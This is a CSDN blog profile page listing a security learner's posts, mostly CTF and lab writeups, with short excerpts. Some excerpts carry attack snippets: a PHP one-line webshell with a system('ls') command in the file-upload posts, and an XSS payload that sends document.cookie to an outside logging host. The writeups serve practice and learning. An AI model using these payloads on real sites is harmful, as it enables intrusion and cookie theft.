自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(43)
  • 问答 (1)
  • 收藏
  • 关注

原创 CTF MICS笔记总结

ctf mics各种题型的解题方法总结,全是干货

2022-11-10 22:52:05 3479

原创 OSSEC搭建与环境配置Ubuntu

尝试使用Ubuntu配置了OSSEC,碰见很多问题并解决了,发表博客让后来者不要踩那么多坑。

2024-09-14 15:46:43 1775

原创 泛微e-cology WorkflowServiceXml SQL注入漏洞(POC)

泛微 e-cology v10.64.1的/services/接口默认对内网暴露,用于服务调用,未经身份认证的攻击者可向 /services/WorkflowServiceXml 接口发送恶意的SOAP请求进行SQL注入,攻击者通过漏洞可以获取服务器数据库敏感信息。分析:基于当前情报,漏洞可能被用于攻击e-Cology WorkflowServiceXml系统,建议更新系统补丁、加强输入验证和限制访问权限。更新e-Cology WorkflowServiceXml系统到最新版本。

2024-07-16 09:57:37 1132

原创 python实现BMP图像位图法隐藏信息

使用python实现BMP图像位图法隐藏信息

2024-05-30 00:42:14 806 1

原创 Python 利用PYQT5设计基于RSA算法盲签名的匿名化电子支付系统设计与实现

本文使用PYTHON设计了基于盲签名的匿名化电子支付系统,并使用PYQT5进行页面设计

2024-01-08 00:20:41 1585 12

原创 记录一次SQL注入src挖掘过程

记录挖洞小白的一次SQL注入挖洞经历

2023-09-29 12:54:20 1093

原创 使用PYQT制作人才交流管理系统

利用使用PYQT制作一个人才交流管理系统,先使用QT designer.exe设计好人才交流管理系统的各个UI界面,然后利用pyuic把生成的ui界面编译为py文件,在主函数文件内创建一个类继承ui.py界面的类,即可完成数据库逻辑与 GUI 代码分离,以提高可维护性和可重用性。

2023-07-08 11:32:30 645 2

原创 buuctf-Java逆向解密

buuctf-Java逆向解密的解题方法

2023-06-21 19:14:54 824

原创 BUUCTF-逆向[GXYCTF2019]luck_guy1题解

BUUCTF-逆向[GXYCTF2019]luck_guy1题解,有关伪随机数知识和小端序存储知识

2023-04-05 17:41:37 1404 1

原创 Go Socket图形化网络编程

Go Socket图形化网络编程,学习Go基础

2023-01-13 17:24:25 301

原创 GO子域名探测命令行工具

GO子域名探测命令行小工具,未完~~~~

2023-01-10 17:53:49 287

原创 GUETCTF第三届梦极光杯初赛部分WP

参与了GUET的梦极光杯,学习到了很多,分享一下WP

2022-12-30 10:45:43 346

原创 攻防世界hello pwn WP(pwn入门基础题)

攻防世界hello pwn WP(pwn入门基础题)的简单讲解

2022-11-21 19:53:33 2215

原创 第一届广西英招杯部分WP

参与了广西英招杯,里面的题还蛮有意思,写个博客记录一下解题方法。

2022-11-19 00:31:51 862 3

原创 网络渗透测试实验课实验四-CTF实践

网络渗透测试实验课实验四-CTF实践

2022-11-16 21:29:01 423 2

原创 网络渗透实验三:XSS用Beef劫持被攻击者客户端浏览器。Beef基础,SQL注入使用SQLMAP

网络渗透实验三:XSS用Beef劫持被攻击者客户端浏览器。Beef基础,SQL注入使用SQLMAPsqlmap基础

2022-11-07 18:50:49 606

原创 攻防世界逆向game(IDA pro 7.6)

攻防世界,逆向,game,适合新手的简单逆向题目

2022-10-28 13:57:50 905

原创 数据结构---实现队列的三种形式

数据结构---实现队列的三种形式,附带代码,用的是visual studio2022,望能帮助大家更好地学习数据结构的队列

2022-09-26 20:51:04 407

原创 靶机渗透练习Vulnhub DriftingBlues-6

Vulnhub DriftingBlues-6 利用了脏牛提权,适合新手的简单靶场

2022-09-25 12:27:35 1382

原创 vulnhub-DC-9靶机渗透记录(适合新手详细版)

vulnhub-DC-9靶机渗透记录,超详细,适合新手

2022-09-09 13:13:48 1392

原创 靶机渗透练习Vulnhub DriftingBlues-1

靶机渗透练习Vulnhub DriftingBlues-1 ,适合新手的简单靶场

2022-09-03 15:11:37 925

原创 MS17-010漏洞复现(带win7虚拟机安装,零基础)

永恒之蓝漏洞复现(带win7虚拟机安装,零基础)

2022-08-13 21:37:59 7913 1

原创 pikachu靶场SQL,sqlmap解法

相信大家都熟悉了pikachu靶场的手工注入方法和原理,但是对于盲注等一些复杂的注入,自己一个个试十分麻烦,此时我们就可以使用sqlmap进行注入,所以我整理了一些pikachu靶场的sqlmap解法,让新手更好地适应和熟练使用sqlmap这款十分好用的工具...............

2022-07-31 20:59:43 2865 3

原创 用msf模拟攻击自己的window,msf基础

使用msf制作病毒控制自己的window,学习msf基础的用法和msf的一些基础功能

2022-07-31 13:38:54 1129

原创 vulnhub-DC-4靶机渗透记录(带字典)

vulnhub-DC-4 打靶记录,这个靶大多数都是信息收集有bp爆破,ssh连接,hydra爆破,普通用户提权,往敏感目录/ect/passwd 写入用户

2022-07-05 23:24:25 242

原创 ctfshow SQL注入Web175

查询语句//拼接sql语句查找指定ID用户$sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;";返回逻辑//检查结果是否有flag if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){ $ret['msg']='查询成功'; }Play...

2022-05-01 12:14:53 921

原创 ctfshow SQL注入Web171-174

2022/4/24SQL注入Web171语法:查询表中的数据查询所有行命令: select <字段1,字段2,...> from < 表名 > where < 条件>例如:查看表 MyClass 中所有数据mysql> select * from MyClass;查询语句//拼接sql语句查找指定ID用户$sql = "select username,password from user where username !='fl.

2022-04-25 19:12:49 1546

原创 ctfshow反序列化web256

反序列化Web256题目有判断password和username相不相等判断了才进行反序列化<?//ctfshow 反序列化web256class ctfShowUser{ public $username='1'; public $password='2'; public $isVip=ture; public function checkVip(){ return $this->isVip; }

2022-04-22 20:22:16 353

原创 ctfshow 反序列化Web254-255

2022/4/17反序列化漏洞的产生主要有以下两个原因:1. unserialize 函数的参数可控。2.存在魔法函数。魔法函数__construct,__destruct,__call,__callStatic,__get,__set,__isset,__unset,__sleep,__wakeup,__toString,__invoke,__set_state,__clone和__debuginfo等成员函数在PHP中被称为魔法函数。在命名自己的类方法时不能使用这些名称,除非是想使用其

2022-04-21 11:35:21 2299

原创 ctfshow 日志包含Web80-81

2022/4/16题目过滤了php和data,我们这次要用日志文件包含先抓包nginx日志的默认路径为/var/log/nginx.ssh日志的默认路径为/var/log/auth.logSSH服务如果开启了日志记录功能,会将SSH的连接日志记录到SSH日志文件中(题目是nginx日志)日志文件包含的漏洞的利用条件是:日志路径已知,并且有可读权限。日志文件的默认路径为上述现在要将恶意代码写入日志文件/?file=/var/log/nginx/access.log&

2022-04-16 22:28:28 6295

原创 ctfshow 文件包含Web78-79

Ctfshow文件包含漏洞Web782022/4/15漏洞简介:文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。文件包含漏洞可能会造成服务器的网页被篡改、网站被挂马、服务器被远程控制、被安装后门等危害。Web78考察php伪协议php://伪协议:php://伪协议是PHP提供的一些输人输出流访问功能,允许访问PHP的输入输出流,标准输人输出和错误描述符,.

2022-04-15 23:16:26 1896

原创 学习Kali的笔记

2022/4/15查看当前使用的Shell类型:/usr/bin/zsh#可以看到我们使用是zsh类型的shell。centos7 使用的是bash类型的shell。zsh功能更强,而且zsh完全兼容bash的用法和命令。配置apt命令在线安装包的源为国内源命令:# vim /etc/apt/sources.list配置apt国内源因为Kali自带的源是国外的,经常会因为网络问题,而无法安装或更新软件包。而且国外的源速度很慢。所以我们直接使用国内的源,方便快速。.

2022-04-15 21:06:50 1657

原创 ctfshowSSRF漏洞Web351-352

SRF漏洞简介SSRF意为服务端请求伪造(ServerSideRequestForge)。攻击者利用SSRF漏洞通过服务器发起伪造请求,这样就可以访问内网的数据,进行内网信息探测或者内网漏洞利用。SSRF漏洞形成的原因是:应用程序存在可以从其他服务器获取数据的功能,但是对服务器的地址并没有做严格的过滤,导致应用程序可以访问任意的URL链接。攻击者通过精心构造URL链接可以利用SSRF漏洞进行以下攻击:(1)通过服务器获取内网主机、端口和banner信息。(2)对内网的应用程序进行攻击,例如...

2022-04-13 17:15:38 1117

原创 ctf misc 图片隐写(所见非真)

第一次写misc题目走好多坑记录一下解题思路了得到题目一个压缩包还有一个照片用Winhex打开它在文件的最后发现了flag.txt,要把它提取出来把该图片文件拉入kali的主文件夹(没有kali的在VM上装个kali^^)用binwalk这个命令分解这个图片的文件binwalk - e scada. ipg得到这个文件夹...

2022-04-09 23:10:20 3332 4

原创 ctf misc之MP3隐写

2022/4/9第一次写mp3隐写,走了好多坑记录一下题目得到一个MP3文件和一个压缩包然后听一遍这个歌发现最后面有一段非常违和的用Audacity打开这个mp3查找了一下MP3的隐写方法有以下几种:MP3编码隐写将数据隐藏在MP3文件的奇偶校验块中(有个密码而且要用MP3Stego)音频频谱隐写音频波形隐写(结合莫尔斯密码)音频中的LSB(最低有效位)隐写然后本题目是:音频波形隐写点击这个小尖尖可以选择波谱图直接点看不到什么东西结合我...

2022-04-09 22:35:05 5474

原创 ctfshow XSS漏洞web316-328

2022/4/7Web316 XSS 反射性XSS圣诞快乐,写下祝福语,生成链接,发送给朋友,可以领取十个鸡蛋!CEYE - Monitor service for security testing先在这个网站注册一个账号获得一个临时的域名红框内的是临时的域名然后在方框中输入:<script>varimg=document.createElement("img");img.src="http://你的ceye地址/"+document.co..

2022-04-07 23:16:57 1966

原创 ctfshow信息收集Web18(玩游戏)

不要着急,休息,休息一会儿,玩101分给你flag点进去是一个游戏查看游戏的js代码查看js代码查看通过游戏后会展示的内容是一个Unicode编码的查看110.php得到Flag

2022-04-07 11:38:42 3793

原创 ctfshow文件上传web152

先写一个一句话木马文件<?phpeval($_POST[1]);?>上传我们刚刚写好的木马发现上传失败查看源码发现只能上传png文件把它改成php上传我们刚刚写的木马文件发现还是不行用抓包软件在上传的时候进行抓包发送到重发器Content-Type是文件类型,不同的文件都会对应不同的ContentType。PHP文件的文件类型为:application/octet-streamPng的Content...

2022-04-05 22:24:58 328

原创 ctfshow文件上传web151

2022/4/5先写一个一句话木马文件<?phpeval($_POST[1]);?>试着上传php木马文件上传失败查看源码发现只能上传png文件把它改成php上传我们刚刚写的木马文件访问我们刚刚上传的文件利用Hackbar用post的方式提交1=system("ls /");没有发现flag的文件查看上一层的目录用post的形式提交1=system("ls ../");发现...

2022-04-05 21:51:19 1158

原创 ctfshow命令执行web30-39

ctf的命令执行

2022-04-05 00:13:55 1589

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除